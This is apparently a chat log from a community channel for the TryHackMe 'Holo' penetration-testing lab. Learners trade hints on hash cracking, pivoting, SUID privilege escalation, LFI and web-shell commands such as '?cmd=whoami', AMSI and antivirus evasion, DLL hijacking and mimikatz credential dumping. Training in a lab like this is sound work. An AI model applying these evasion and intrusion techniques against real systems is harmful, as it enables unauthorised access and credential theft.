when it stops you just have to start it back up

Nvm, I’m stupid. Figured it out

One more issue, I can access the web page of 10.200.x.31 but can’t ping it or run an nmap scan

need help on cracking shadow file ?

What is the plaintext cracked password from the shadow hash?
i got hash but it took long time to crack still cracking help me with this

ping won't work because it's a windows host and it's very likely it has that disabled
nmap scan should work, but if you're proxying through sshuttle then it will report all ports as open, and you'll need to either run the scan from the linux (.33) machine or switch to a socks proxy

I’m using chisel and have configured proxychains and am using nmap with it, on running a scan it tells me that all 1000 ports are filtered

Use colabcat like instructed in the walkthrough

@wind bobcat did you change the IP because of that one router thing

Am confused

i tried but dont know how to use it

All of the instructions to use colabcat are outlined in colabcat

ok letme try

anyone care to give me a push in the right direction on task9 ?

I must be missing something basic

On the first question?

I tried dirbuster, wfuzzing, gobuster... nothing came back with a filename or directory that had any usefull content

Did you put extensions on the end?

-x yes

mind DM?

sure

wat no?

Den why tis it .100

idk I just woke up

I have no idea what's happening

dude i tried with colabcat but can't crack the passwd 😦

You think I didn’t just wake up

I don’t know what happening

Could you be a little more verbose, show us what you’re doing

i used rockyou75 from seclist

can i dm you

that's why

Why did you use 75

you should be using the full fledge rockyou

@wind bobcat no one has commented on the glorious usage of vtubers

which set default on colbcat

because we use them for essentially nothing lel

Change it, the password isn’t in 75

ok

colabcat shell is bit hard to use

Hello to all of you , i hope you have a great time ! I think im stuck at task 18 ! i think i tried everything but i cant priv esc from the www-data user and when i try the sudo www-data needs a password . Any hints ? did i miss something ?

did you find the ||SUID bit?||

you can do one off commands on google with
!cat /etc/passwd
for example

Yeah i did that bit

did you find the exploit on gtfobins?

it’s not a sudo exploit it’s an suid exploit

Just change the commands where they are already typed rather than using the blind shell

Thats true indeed but also with the SUID had no luck, i will give it a little more time

might have missed something / did something wrong

yep, the exact command from gtfobins won't work

you need to understand what the command is doing and how to adjust it for what's on the box

you won’t be able to just copy paste it onto the machine you’ll need to tweak it slightly to the target

hmmm ok i see, will do a little more research , thanks for the help appreciate it !

got it

I am missing the point of task10

task 10 is more or less just a "practice exploiting some vulnerabilities and see what goes into them and see what actually makes them vulnerable so you can avoid this irl"

I was more like ok so theres a dev environmont... should I be getting root somehow?

Or.... I can install this locally...

that's a local thing

i.e. you install and play around if you like

if this is your first time doing web app exploitation, it's recommended, if not, it's whatever

" we have provided a development instance of a test server" ... This to me reads THM have provided,,,

@lone spruce stop wording things bad

But I get it now.

I just had to reword your babbling

yeah stoP

you made it confuse the people

In the mean time I cracked in my local machine 😅

Stuck at task13. I cannot get my shell to actually output again. Tried combining for zsh, or switch to bash... no luck.

looks like python and socat are not installed 😦

You can get static binaries that will run on any Linux machine of the same architecture for both of those

It’s very very unlikely to see socat installed

Python is more likely but not always there

Hmm there's no internet in holo

you can host them on your own machine, and transfer them from there

since the internal machines can reach your one

Ah yes I can do that

I really need to learn that everything is fair game. And not a CISO game

That doesn’t matter. Like szymex said you can download to your machine and then send on to the otehr machine

I mean I am usually not busy with trying to break in.

would i be possible to have someone reset holo network just started on it and webserver is not repsonding

Oh my.. The AV evasion part is a challenge for me since I never had to use it 😅 but learning so damn much! 😁 really having fun with the challenges, lot of Homer Simpson "Do'h!" moments.

you'll need to be specific about what subnet you're on. Most people here are on a different one.

If you're on .69, leave and rejoin

Stuck on task 34 uploaded the staget.php file tried to trigger the php but i can't. Am i missing anything ? need help with this

What do you mean by can’t?

i got code execution in my local windows machine i successfully bypassed AV but on remote server it can't execute my payload

Could you show us what you’re doing, show the payload, etc

Sorry was just away 10.200.142.xx

Edited- AFter i got back it was stopped 🙂 - ie. problem solved

i can't send screen shots here can i dm you

You need to verify

!docs verify

!docs verify

send the bot "!verify <token>" you get your discord token in the profile page on thm

Ok

https://tryhackme.com/profile

and dm the bot do not post it here in the discord :)

(your token)

Php wrapper i used

my shell.ps1 scripts works on my local machine enabled windows defender

From server i got hit but the payload did't executed

Got shell from local machine

@wind bobcat It's down again 10.20.142.x used ffuf with -t 10

I don't have control over the individual network instances

Okay guess I have to wait until it shuts down

reset != shutdown

shutdowns preserve the network state

resets restore it from the images we provided

Yeah but hope it will reboot the Webserver so I can continue no others are using the network it seems

i dont believe the docker container is graceful lol

typically, they're not designed to be

@lone spruce

If I had to guess it’s because of character escaping in php. That payload also looks sketch and might still get picked up even if it didn’t on your local machine.

I have a small doubt in task 31 with the code to bypass ASMI, I don’t see it being used anywhere else. According to what I understood, you copy a normal PowerShell payload, you obfuscate it with Invoke-Obfuscation and link it to the php wrapper. Please correct me if I am wrong.

ish

there are a variety of techniques there that can be used

Cleaning, Obfuscation, Bypassing

I think I intended to make a precursor task and then got caught up and forgot about it

But is this right?

again -ish

that is one way of doing it

So is it important that I add the asmi bypass with my ps rev shell and obfuscate it together or I do I really need the asmi bypass ?

depends, does your payload get picked up by AMSI?

If yes, then yes. If no, then no

Thank you

quick question inside the docker container my ip seems to be different from the one in solution ? - shouldn't I be able to see it with ifconfig ? ie the last octet is xxx the answer is only x

@wind bobcat ree

go away

I am currently on the DLL Hijacking part on PC-FILESRV01. But I don't see any scheduled tasks that could be used for DLL Hijacking. All of them are in the \Microsoft\Windows\ folder. So i don't think that these binaries will be vulnerable to DLL Hijacking. Any suggestions?

there should be another one that runs a file in a users home folder

Thank you. Seems like we have to reset the network

Gave +1 Rep to @wind bobcat

Hi, I'm struggling with the LFI task on Holo, when I try to read the file it downloads the root page and doesn't actually display the path passed to the parameter, am i missing something?

try curling that URL opposed to accessing it via web

yeah i did and it didn't load

i'll try again

it worked thx, the server might have just crashed when i tried before

its legitimately broken you nematode

go

away

uhhhh i am stupid? this nmap scan doesn't work so instead of x I could try 0-255 right?

192.168.100.0/24 this works so hek, not a network problem

for example, 10.200.104.0/24

you'd replace 104 with whatever subnet thm assigned you to

ah so the subnet is different for everyone,
first network for me,didn't know that

also, the access is only for 9 days..? idk if that would be possible with my University on : P

#wreath-network message

@cedar maple ^

Oh thanks for that

regarding the dll hijacking i can see the exe file, but i cant see which service that is running this ?

Does anyone have external resources or videos on the AV evasion module?

Process Doppelgäning: https://www.youtube.com/watch?v=XmWOj-cfixs&list=WL&index=11
Evading Detection: A Beginner's Guide to Obfuscation: https://www.youtube.com/watch?v=lP2KF7_Kwxk&list=WL&index=13
Understanding Modern EDR Tools: How They Work, How They Provide Value, and How to Bypass Them: https://youtu.be/6OF6lA0kCuY
Also you could look each technique for "defense evasion" in MITRE ATT&CK: https://attack.mitre.org/tactics/TA0005/
Also process ghosting is a relativly new technique: https://www.elastic.co/blog/process-ghosting-a-new-executable-image-tampering-attack
You could also consider DLL unhooking... this is also pretty effective

Thank you

Gave +1 Rep to @cobalt isle

Hey, I'm on the last question of task 12 and really struggling with executing a command with the ?cmd= , I've tried just changing a few bits on the curl command given in the task and changed it to this: ||curl -vvv http://admin.holo.live/dashboard.php?cmd=whoami && echo ""|| which doesn't give me anything except the headers (I'll post a screenshot) Can someone give me some help on what I'm missing?

Why the && echo ?

That's included in the example command used on the test environment, it doesn't change the output when I tested without it

Have you tried in a browser ? And if so what could be the difference ?

A good thing to test is to proxy the browser request Through Burp

Ok, I'll try that :)

hey uhh, I added "holo.live" to my /etc/hosts, gobuster seems to work but Firefox still doesn't resolve the holo.live domain for me,
am I doing something wrong?

You need to add "www.holo.live" and likewise with every subdomain

oh

so also add "subdomain.holo.live ip" for every subdomain

Took me a while to figure that out as well 😅

damn, yeah : P I can see why

Is this fairly normal, adding ips /etc/hosts? Didn't see this in any beginner rooms but I do see this in the medium writeups

It depends, you often don't have to do it but when you work with subdomains you have to (I think) like in Holo and the upload vulns room but it's also useful so that you don't have to memorize the ip

Thank you! That worked :)

Gave +1 Rep to @terse hazel

ah that explains, thanks!

Gave +1 Rep to @upper rock

can someone help with task47 I waited for ever to get a hash back(task 46) without luck , and task 47 i just get an error

Am going to snitch on myself, but it's good because someone else won't fall in the trap...so I got a working shell on S-SRV01 using a command exploit in thea PNG file. Exactly the same payload that worked on the Wreath Network....you get a shell as nt authority\system and all...I also dumped the Sam and System hives and extracted the hashes.

Here's the caveat, or where it's all screwed, by not using the AV bypass payload, it means that AMSI is very much alive and whenever you try to upload mimikatz or any powershell script, it gets picked up immediately. So keep that in mind. I'm going to have to patch AMSI becsuse it's the only way I can move forward.

Oh, and there's a netcat binary in the webserver images folder...In my defence, I was testing things out, to see if it'll work and it worked. We can reset the whole thing, I believe that will get rid of it as I've tried deleting it but I keep getting a permission denied.

@outer junco @clear zephyr

We're you not able to bypass AMSI?

That’s probably another users, if you see another tool like that it’s usually best not to mess with it as it’s another users. Remember they’re shared instances

The VPN error?

@lone spruce I'm the one who uploaded the netcat binary...I can confirm that 100%...deleting it is the issue, but I figure a network reset will do the trick?

@clear zephyr no, just a plain old netcat shell with AMSI enabled.

Ah I see, yeah if you reset the network you will get fresh images of all the machines

@lone spruce alright

@lone spruce Found another unintended, I think, way of running mimikatz without doing squat about the AMSI bypass

Can I dm or just post it here?

there are no unintendeds here

it is an open lab with intended ways, we guide you through the process we suggest. How you pwn it is up to you

I wouldnt even use an AMSI bypass with mimikatz because it would be on disk and AMSI would assume defender is already instrumented

its more about teaching rather than a challenge

My .ps1 payloads get detected on running even after encoding but threatcheck just says no threats found and if I switch the engine to amsi it tells me to ensure if real time protection is enable which is

@lone spruce Noted

what is the error when you run it?

It gets detected by the av, but when I run it against threatcheck it says that no threats were found

have you tried not putting it on disk?

Yes